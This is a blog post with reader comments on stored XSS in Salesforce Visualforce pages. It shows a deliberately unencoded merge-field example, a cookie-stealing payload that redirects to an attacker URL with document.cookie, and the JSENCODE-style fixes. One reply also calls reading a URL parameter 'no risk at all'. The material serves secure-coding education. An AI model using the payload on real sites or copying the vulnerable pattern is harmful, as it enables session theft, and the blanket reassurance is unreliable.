Salesforce applications with security : Stored XSS


Continuing from my previous post, this time I would like to share some knowledge on the Stored XSS part.
Stored XSS is cross-site scripting where an attacker can inject code into the server's pages permanently, so the script runs whenever some action is performed on the page.

In other words :
“Stored attacks are those where the injected code is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information.”

Let’s have an example:

<script>
    function crossXSS() {
        var xssExample = '{!Account.Name}';   // merge field written unencoded into a JavaScript string
    }
</script>
<apex:commandLink value="Click me" onclick="crossXSS();" />


Now suppose the Account Name is:
testName';1';document.location=''%2Bdocument.cookie;var%20foo=';

So this account name will always be on the page inside the script block, and whenever the commandLink is clicked, crossXSS will be called and the rendered statement will look like this:
var xssExample = 'testName';1';document.location=''%2Bdocument.cookie;var%20foo=';

So again you can see that all the cookies will be sent to the attacker's site.

Repeating what I suggested in the previous blog :).

To prevent this, Salesforce provides encoding functions that are available on Visualforce pages, such as JSENCODE, HTMLENCODE, JSINHTMLENCODE, URLENCODE, etc.

So the code explained above can be updated as:
var xssExample = '{!JSENCODE(Account.Name)}';

So the value merged into the page will now be encoded.
JSENCODE: To encode properties written into JavaScript.
HTMLENCODE: To encode properties written into HTML.
JSINHTMLENCODE: If calling a JavaScript method from an HTML component and passing the properties.
URLENCODE: If building a URL on the page.

Please feel free to ask the questions/doubts. Suggestions are appreciated.

4 thoughts on “Salesforce applications with security : Stored XSS”

  1. Hi, I am using this to read the parameter.
    Before passing it to the URL, I encode the parameter using JSENCODE in the JavaScript function.

    The following line in the controller reads the parameter:

    String temp = System.currentPageReference().getParameters().get('Amt');
    Is there a risk?


  2. Hi Srikanta M,

    There is no risk at all, but if you want to use this variable in a dynamic query then you need to "escapeSingleQuotes" it, like String.escapeSingleQuotes(temp), before using it in dynamic SOQL.

    Deepak Choudhary
